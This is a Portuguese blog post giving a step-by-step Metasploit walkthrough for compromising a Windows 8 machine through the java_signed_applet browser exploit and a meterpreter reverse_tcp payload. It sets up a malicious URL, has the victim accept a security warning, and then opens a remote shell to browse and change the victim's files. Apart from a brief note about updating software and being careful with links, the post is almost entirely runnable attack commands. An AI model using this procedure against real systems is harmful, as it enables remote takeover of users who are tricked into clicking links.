sábado, 25 de janeiro de 2014

Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários a clicaram em links através de textos os imagens esta vulnerabilidade pode ser explorada.

Conscientize amigos e colegas de trabalho para se atentarem aos links que recebem via e-mail, facebook e ente outros para evitarem se serem vítimas desta vulnerabilidade.

Uma forma de evitar é manter sempre o Windows e o Antivirus devidamente atualizados.

Dados Técnicos:

Kali Linux: 10.10.10.130
Windows 8: 10.10.10.129

Passo 01

Execute o MSF Console

root@kali:~# msfconsole


Passo 02

Utilize o exploit java_signed_applet


msf > use exploit/multi/browser/java_signed_applet


Passo 04

Defina o servidor Kali Linux (10.10.10.130) como conexão principal do exploit java_signed_applet

msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130


Passo 05

Defina a porta do servidor Kali Linux (8080) como conexão principal do exploit java_signed_applet

msf exploit (java_signed_applet) > set SRVPORT 8080


Passo 06

Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor


msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp


Passo 07

Defina o servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp


msf exploit (java_signed_applet) > set LHOST 10.10.10.130


Passo 08

Defina a porta do servidor Kali Linux (10.10.10.130) como conexão principal para o PAYLOAD reverse_tcp


msf exploit (java_signed_applet) > set LPORT 4444


Passo 09

Execute o exploit para gerar a URL a ser acessada pelo Windows 8 (http://10.10.10.130:8080/clR8lKjmGpiSXqQ)

msf exploit (java_signed_applet) > exploit


Passo 10


No Windows 8 ao realizar o acesso ao link (http://10.10.10.130:8080/clR8lKjmGpiSXqQ) será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar


Passo 11


Observe que a conexão foi estabelecida com o servidor


Passo 12

Execute o comando sessions para exibir as sessões de conexão

msf exploit (java_signed_applet) > sessions


Passo 13

Estabeleça a conexão na sessão 1


msf exploit (java_signed_applet) > sessions -i 1


Passo 14

Com a conexão estabelecido digite comando utilizados no windows como o ipconfig para visualizar as conexões de rede


meterpreter > ipconfig


Passo 15

Utilize o comando sysinfo para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional


meterpreter > sysinfo

Passo 16

Execute o comando shell para exibir o console do Windows 8


meterpreter > shell


Passo 17

Liste todos arquivos/diretórios que estão no Desktop


C:\Users\Marcos\Desktop>dir


Passo 18

Crie o diretório 100SECURITY


C:\Users\Marcos\Desktop>mkdir 100SECURITY


Passo 19


Como pode visualizar o diretório 100SECURITY foi criado com sucesso


FONTE : 100security.com.br

Nota:

0 comentários:

Postar um comentário

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]